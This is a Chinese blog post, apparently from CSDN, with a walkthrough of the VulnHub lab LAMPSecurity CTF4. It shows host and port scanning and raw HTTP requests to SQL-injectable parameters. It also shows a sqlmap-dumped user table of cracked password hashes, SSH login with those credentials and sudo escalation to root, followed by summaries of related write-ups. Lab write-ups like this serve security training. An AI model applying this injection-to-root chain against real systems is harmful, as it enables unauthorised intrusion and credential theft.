ctf php168,CTF靶场系列-LAMPSecurity: CTF4

最新推荐文章于 2024-03-08 16:58:29 发布
最新推荐文章于 2024-03-08 16:58:29 发布
阅读量202 收藏
点赞数
文章标签: ctf php168

下载地址https://download.vulnhub.com/lampsecurity/ctf4.zip

实战演练

使用netdiscover命令查找靶机的IP。

b3e03a3965e6e410cd080655706cf40c.png

使用nmap查看靶机开放的端口

0dca7ce5f95e6f60f79f116008079c50.png

打开浏览器

1bacdd9760992d1d14e7534fb343d462.png使用avws进行扫描

42985ffb3ae55598730dcae7e0667fbb.png目录遍历漏洞

17c944b18b00132668aeefd01120cf25.png注入POST /admin/index.php HTTP/1.1

Content-Length: 149

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://192.168.0.104:80/

Cookie: SQMSESSID=q683eq5e3hqdtute97e0bh9ub5; squirrelmail_language=en_US

Host: 192.168.0.104

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

password=1&username=bbuaootc

fa8e2407be0e90cd7cd9090d0e61114a.pngGET /index.html?id=7&page=blog&title=Blog HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: http://192.168.0.104:80/

Cookie: SQMSESSID=q683eq5e3hqdtute97e0bh9ub5; squirrelmail_language=en_US

Host: 192.168.0.104

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

dea667e82748c7941613a3b39adeeb0c.png用sqlmap跑到user表

28681e5000f39196c33c74dfc2311dda.png+---------+-----------+--------------------------------------------------+

| user_id | user_name | user_pass                                        |

+---------+-----------+--------------------------------------------------+

| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |

| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |

| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |

| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |

| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |

| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |

+---------+-----------+--------------------------------------------------+

用这些用户名和密码看看能不能登录SSH

c0fc54fdf36c624e5e6c5c300867731f.png好儿戏阿=-=居然直接可以提权

cdf8dcce37ba99d249a21abb1cec3d4c.png

weixin_39805409
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFLAMPSecurity CTF4 靶机渗透(SQL注入)
afei001
08-06 909
  练习环境     攻击机:kali     靶机LAMPSecurity: CTF4     下载地址:https://download.vulnhub.com/lampsecurity/ctf4.zip      1.发现靶机端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.99.177 netmask 255.
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
LampSecurityCTF4靶场练习
qq_44484541的博客
04-04 172
提权,由于是比较高的权限,我们可能直接创建一个bash进行提权,成功获得root权限,但还是存在一些信息无法查看的情况,但也不影响。------查看当前用户的权限,目前是获得了一个ALL ALL的权限 比较高的权限。访问网页,使用单引号确认是否真实存在sql注入,发现报错,确认真实存在注入。------通过数据库枚举找到了数据库中的账户密码信息并被破解了出来。通过使用以下参数使算法一致,将出现报错的算法粘贴在参数后。通过爆破出来账户密码,使用ssh测试是否可用。------发现网站存在sql注入漏洞。
打靶 LAMPSECURITY: CTF4
Mysmycbx的博客
03-12 198
LAMPSECURITY: CTF4
红队打靶:LampSecurity:CTF4打靶思路详解(vulnhub
Bossfrank的博客
06-19 1512
本文对vulnhub靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
计算机网络安全技术:在线CTF靶场.pdf
05-12
在线CTF靶场介绍与体验 CTF (Capture The Flag)中文一般译作夺旗赛,在网络安 全领域中指的是网络安全技术人员之间进行技术竞技的一种比 赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之 前黑客们通过互相...
信息安全_.第六期.CTF.Web之Vulnhub靶场.课件资料.pptx
08-14
1.Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,每个镜像会有破解的目标。 2.通过Vulnhub靶场靶机实战讲解从信息收集到获得...
基于python的网络攻防平台(CTF)设计与实现
07-30
网络攻防演练系统是基于python中flask框架下平台,该平台借助于网上各种CTF靶场设计框架进行构想,搭建一个CTF解题模式为主的网络攻防平台。系统主要完成以下几个模块:用户登录与注册系统模块、用户个人解答详情...
CTFcrack框架_CTFtools_2.7z
02-13
网络攻防,CTF框架。如果又想做CTF题的胖友可以下载一下。 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客...
LAMPSecurity——CTF4
qq_51175992的博客
10-11 177
这个靶场总体来说比较简单(比上周做的DC系列更简单),正常的nmap进行端口信息收集,然后在Web页面发现SQL注入漏洞,借助sqlmap顺利拿到用户和其密码信息。但是在SSH爆破时因为靶场时间太久了,密钥交换的算法不一致导致被一直无法正常爆破,后来通过大佬的指点通过设置密钥算法的参数完成登录。最后的提权部分就是/bin/bash提权就行。
ctf php168,CTF—攻防练习之HTTP—PUT上传漏洞
weixin_39830225的博客
04-01 109
主机:192.168.32.152靶机:192.168.32.159中间件PUT漏洞包括apache,tomcat,IIS等中间件设置支持的HTTP方法(get,post,head,delete,put等)每一个开放了HTTP方法都有其对应功能,PUT方法可以直接从客户机上传文件到服务器,如果中间件开放了HTTP中的PUT方法,那么就可以利用上传webshell到服务器对应目录扫描靶机端口: 然后...
【学渗透靶机——lampSecurityCTF4
jieli0901227的博客
05-13 291
page=blog&title=Blog&id=2 地址存在注入。发现sudo - l 发现该账号sudo 可执行root 所有命令,并且不需要密码。2、使用 order by 判断数据库的列。5、查询user 表的字段信息。4、查询当前数据库有哪些表。3、使用联合注入找报错点。nmap 主机漏洞探测。扫描出也没什么有用信息。1、通过浏览页面发现。
vulnhubctf4
qq_54030686的博客
10-25 1355
检测发现存在sql注入,这里使用sqlmap下载数据库中的数据,别问为什么下载,一个字,快。对80开放的web服务进行检测,这里使用rad加xray配合检测,友情提示,netdiscover或者nmap -sP 192.168.2.0/24。初步进行检测,并且进行端口扫描,发现开放22端口,80端口等。使用ssh登录时候,可能会产生一定的错误,这里给出解决方法。在user数据表中发现用户名以及密码,编辑为字典,时候,输入该用户对应的密码即可成功变成root用户。vulnhubctf4
ctf4靶机渗透
weixin_45914445的博客
05-24 414
ctf4靶机渗透实验环境:一、实验过程二、使用步骤1.信息收集2.sqlmap进行漏洞利用 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录实验环境:一、实验过程二、使用步骤1.信息收集2.sqlmap进行漏洞利用 实验环境: kali linux的IP地址为192.168.42.137 一、实验过程 1、信息收集 2、漏洞挖掘 3、权限提升 二、使用步骤 1.信息收集 1.1 主机发现 netdiscover -i eth0 -r 192.168.42.0/24
VunlnHubCTF4
qq_45434762的博客
05-21 449
主机发现使用nmap扫描网段,寻找靶机IP地址sudo nmap 192.168.169.1/24 靶机的IP是192.168.169.143端口探测使用nmap进一步探测目标主机开放的...
Vulnhub_CTF-4
weixin_44193247的博客
12-02 879
Vulnhub_CTF-4
打靶记录(二):vulnhub——LampSecurity:CTF4
最新发布
pixelpoints的博客
03-08 1156
到包含这一步卡住了,尝试了ssh密钥泄露和直接读取shadow文件,发现权限不够,遂求助于文档,得知在当前目录/restriced路径下存在.htpasswd文件,记录了账号密码。htpasswd是apache的一个组件,主要功能是http验证,但其实.htpasswd并不存在默认路径,这个restriced路径大概率是自己定义的。因为ssh版本过于老旧,putty已经不支持SSH-1密钥的生成了,想生成密钥需要另寻他处,太麻烦而且原理已经差不多搞清楚了,遂放弃。又报错了,这次是key-type的问题。
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3052
Vulnhub-CTF4靶机实战
ctf靶场设计与开发目的与意义
05-10
CTF靶场是一种模拟真实网络攻防情景的虚拟环境,旨在训练和提高网络安全人员的技能和能力。其主要目的是帮助安全从业者学习和实践网络攻防技术,包括漏洞挖掘、漏洞利用、渗透测试、安全加固等方面的技术。 CTF靶场...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值